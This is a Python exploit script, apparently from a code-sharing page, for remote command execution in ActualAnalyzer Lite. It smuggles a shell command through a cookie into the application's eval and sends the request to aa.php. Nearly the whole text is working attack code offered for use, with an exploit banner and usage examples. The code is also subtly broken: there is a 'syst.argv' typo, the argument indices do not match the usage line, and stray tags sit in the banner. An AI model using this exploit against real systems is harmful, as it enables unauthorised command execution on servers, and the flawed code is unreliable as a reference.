扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 |
############################### # ActualAnalyzerexploit. # Tested on Lite version # We load command into a dummy variable as we only have 6 characters to own the eval # but load more as first 2 characters get rm'd. # We then execute the eval with backticks. # 11/05/2011 ############################## import urllib import urllib2 import sys import time def banner(): print " __________ " print " / __/_______ _ ____ ______/ /_________ _/ /___ _________ _/ /_______________" print " / /_/ / / / __ <code>// __ </code>/ ___/ __/ / / / __ <code>/ / __ </code>/ __ \/ __ <code>/ / / / /_/ / _ \/ ___/" print " / __/ /_/ / /_/ // /_/ / /__/ /_/ /_/ / /_/ / / /_/ / / / / /_/ / / /_/ / / /_/__/ /" print " /_/\__,_/\__, (_)__,_/\___/\__/\__,_/\__,_/_/\__,_/_/ /_/\__,_/_/\__, / /___/\___/_/ " print " /_//____/ " def usage(): print " [+] Usage:" print " [-] python " + sys.argv[0] + " -h vulnHOST -d analyticdomain -c \"command\"" print " [-] python fuq.actualanalyzer.py -h test.com/lite -d analyticdomain -c \"touch /tmp/123\"" banner() if len(sys.argv) < 6: usage() quit() domain = sys.argv[2] command = sys.argv[6] host = syst.argv[4] def commandexploit(domain,host,command): url = 'http://' + domain + '/aa.php?anp=' + host data = None headers = {'Cookie': "ant=" + command + "; anm=414.</code>$cot`"} exploit1 = urllib2.Request(url,data,headers) exploit2 = urllib2.urlopen(exploit1) commandexploit(domain,host,command) |
体验盒子
